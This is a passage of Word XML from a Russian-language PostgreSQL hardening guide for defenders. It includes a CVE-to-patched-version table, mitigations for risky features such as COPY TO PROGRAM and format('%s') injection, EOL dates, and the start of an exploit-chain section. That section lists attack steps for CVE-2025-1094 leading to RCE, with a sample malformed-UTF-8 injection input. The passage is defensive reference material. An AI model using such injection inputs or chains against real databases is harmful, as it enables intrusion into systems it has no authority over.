    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Master-таблица: CVE × patched minor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая ячейка major-колонки имеет формат «≤X.Y → X.Z» — последняя уязвимая minor → первая патченая. «—» означает: major не затронут этим CVE (узкое окно, либо EOL до фикса). Для feature-классов (R1–R5, R18–R20, R22, R28) и disputed (R3) — отдельная заметка ниже таблицы.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PG 17</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PG 16</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PG 15</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PG 14</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PG 13</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PG 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="936"/>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 фикса</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CVE-2022-1552</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≤14.2→14.3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≤13.6→13.7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≤12.10→12.11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12.05.2022</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CVE-2022-2625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≤14.4→14.5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≤13.7→13.8</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≤12.11→12.12</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11.08.2022</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CVE-2023-2454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R12</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≤15.2→15.3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≤14.7→14.8</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≤13.10→13.11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≤12.14→12.15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11.05.2023</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CVE-2023-39418</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≤15.3→15.4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10.08.2023</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CVE-2023-5868</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≤16.0→16.1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≤15.4→15.5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≤14.9→14.10</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≤13.12→13.13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≤12.16→12.17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09.11.2023</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memory corruption</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≤16.0→16.1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≤15.4→15.5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≤14.9→14.10</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≤13.12→13.13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≤12.16→12.17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09.11.2023</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CVE-2024-4317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≤16.2→16.3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≤15.6→15.7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≤14.11→14.12</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09.05.2024*</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≤17.0→17.1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≤16.4→16.5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≤15.8→15.9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≤14.13→14.14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≤13.16→13.17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≤12.20→12.21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R10</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libpq MITM</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≤17.0→17.1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≤16.4→16.5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≤15.8→15.9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≤14.13→14.14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≤13.16→13.17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≤12.20→12.21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R8</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bypass</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≤17.0→17.1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≤16.4→16.5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≤15.8→15.9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≤14.13→14.14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≤13.16→13.17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≤12.20→12.21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(PL/Perl)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≤17.0→17.1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≤16.4→16.5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≤15.8→15.9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≤14.13→14.14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≤13.16→13.17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≤12.20→12.21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psql SQLi (CVSS 8.1)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≤17.2→17.3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≤16.6→16.7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≤15.10→15.11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≤14.15→14.16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≤13.18→13.19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EOL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13.02.2025</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 chain</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chain</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 R6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 R6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 R6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 R6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 R6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EOL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13.02.2025</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CVE-2025-4207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 (GB18030)</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≤17.4→17.5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≤16.8→16.9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≤15.12→15.13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≤14.17→14.18</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≤13.20→13.21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EOL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08.05.2025</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 (stats)</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≤17.5→17.6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≤16.9→16.10</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≤15.13→15.14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≤14.18→14.19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≤13.21→13.22</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EOL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14.08.2025</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dump/restore SQLi</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≤17.5→17.6</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≤16.9→16.10</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≤15.13→15.14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≤14.18→14.19</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≤13.21→13.22</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EOL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14.08.2025</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CVE-2025-12817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 (statistics)</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≤17.6→17.7</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≤16.10→16.11</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≤15.14→15.15</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≤14.19→14.20</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≤13.22→13.23</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EOL</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13.11.2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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CVE-2025-13780</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R24</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adjacent RCE (pgAdmin)</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pgAdmin upgrade — вне PG release cycle</w:t>
            </w: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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="93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140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">\* CVE-2024-4317 —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нужно запустить вручную в каждой БД после minor upgrade; binary upgrade не пересоздаёт view. На managed-провайдерах в большинстве случаев не выполняется автоматически — см. 4.9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Feature / pattern / disputed (нет patched minor):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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dblink, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres_fdw, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pg_read_server_files / lo_import — design decision: features требуют superuser для CREATE EXTENSION; USAGE доступен PUBLIC после установки. Mitigation — не ставить, либо REVOKE USAGE (см. 5.4).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R3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> COPY FROM/TO PROGRAM — disputed (CVE-2019-9193): PostgreSQL community считает feature, не bug. Mitigation —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и superuser выдавать только doверенным ролям.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R5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dollar-quoted strings — feature lexical syntax с PG 8.0. Mitigation на WAF-уровне (см. 3.9.1).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R18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identifier injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — code-pattern, не CVE. Mitigation —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(см. 3.16.1, 5.2).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R19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error-based via CAST — code-pattern. Mitigation — параметризация + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEBUG=False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в production (см. 3.2).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R20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stacked queries по wire-protocol — driver behavior, не CVE. Mitigation — extended protocol через драйверный API с параметризацией (см. 3.5).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R22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTE с side effects — feature WITH ... AS (INSERT/UPDATE/DELETE) с PG 9.1. Mitigation — параметризация (см. 3.10).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R28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted extensions — feature PG 13+. Mitigation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON DATABASE FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 2.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EOL-статусы (на дату 2026-05-26):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10 — EOL 10.11.2022.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11 — EOL 09.11.2023.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12 — EOL 14.11.2024. Последний минор-фикс — 12.21 (батч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13 — EOL 13.11.2025. Последний минор-фикс — 13.23 (батч 13.11.2025).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PG 14 — EOL ожидаемо 12.11.2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводка дат batch-ов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Patched minors</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 в batch</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12.05.2022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14.3, 13.7, 12.11, 11.16, 10.21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R15</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11.08.2022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14.5, 13.8, 12.12, 11.17, 10.22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R16</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11.05.2023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15.3, 14.8, 13.11, 12.15, 11.20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R12</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10.08.2023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09.11.2023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16.1, 15.5, 14.10, 13.13, 12.17, 11.22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R13, R14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09.05.2024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16.3, 15.7, 14.12 (+ manual </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fix-CVE-2024-4317.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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R17</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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R7, R8, R9, R10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13.02.2025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17.3, 16.7, 15.11, 14.16, 13.19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 R21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08.05.2025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17.5, 16.9, 15.13, 14.18, 13.21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R27</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14.08.2025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17.6, 16.10, 15.14, 14.19, 13.22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R25, R26</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13.11.2025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18.1, 17.7, 16.11, 15.15, 14.20, 13.23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R23 (+ R24 pgAdmin отдельно)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Быстрая шпаргалка: «у меня PG X.Y — что открыто?»</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в psql. Список ниже — типичные кейсы, что defenders встречают в legacy-кластерах.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17.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 26.09.2024): открыты R7, R8, R9, R10 (закроются в 17.1, 14.11.2024); закрыты CVE 2024-04 и ранее, опубликованные до релиза. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade критичен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до 17.7.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16.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (последняя минор до батча 14.11.2024): открыты R7, R8, R9, R10; добавились R26, R25 (закрылись в 16.10), R6/R21 (закрылись в 16.7), R27 (закрылся в 16.9), R23 (закрылся в 16.11). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сильно устаревший — upgrade на 16.11</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15.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (последняя минор до батча 14.11.2024): открыты R7, R8, R9, R10 + всё что закрылось после в minor 15.9–15.15. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade на 15.15</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14.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (последняя минор до батча 14.11.2024): открыты R7, R8, R9, R10, R6/R21, R27, R26/R25, R23. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade на 14.20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13.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 14.08.2025, предпоследний perед EOL): открыт только R23 (закроется в 13.23); все остальные CVE закрыты. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Финальный patch — 13.23, дальше EOL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12 любая минор после 12.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (14.11.2024 = последний батч): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. R6/R21 (13.02.2025) и далее — навсегда открыты. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Миграция на 13.23+ или новее — единственная защита</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 11 и 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — EOL с 2023 и 2022 соответственно. Все CVE после соответствующих EOL-дат остаются открытыми. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не использовать в production</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Managed-провайдеры — patch lag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS RDS / Aurora обычно отстаёт от upstream на 1–2 minor (patch применяется в provider's maintenance window). Google Cloud SQL — аналогично. Supabase — patch policy variable, в некоторых deployments отставание достигает 4+ minor. Azure Database for PostgreSQL — близко к RDS. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always check current PG version через `SELECT version()`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для верификации, что patch фактически применён, — provider claim в console часто отстаёт от реального состояния. Детали по провайдерам — в 4.9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 Цепочки эксплуатации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Три цепочки, где один CVE усиливает другой или служит ступенью к более серьёзному impact. Цепочка важна тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mitigation одного звена ломает всю цепь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — defender может приоритизировать патчи по тому, какой CVE разрывает максимум цепей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка 1: R6 → R21 (CVE-2025-1094 → COPY TO PROGRAM RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Старт.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Приложение оборачивает user input через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral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PQescapeIdentifier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PQescapeString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и feed-ит результат в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(interactive terminal). Типичные паттерны: BeyondTrust PRA/RS, custom shell-обёртки, скрипты резервного копирования вызывающие psql под капотом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаги цепочки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Атакующий вводит строку с невалидным UTF-8 — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hax\xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
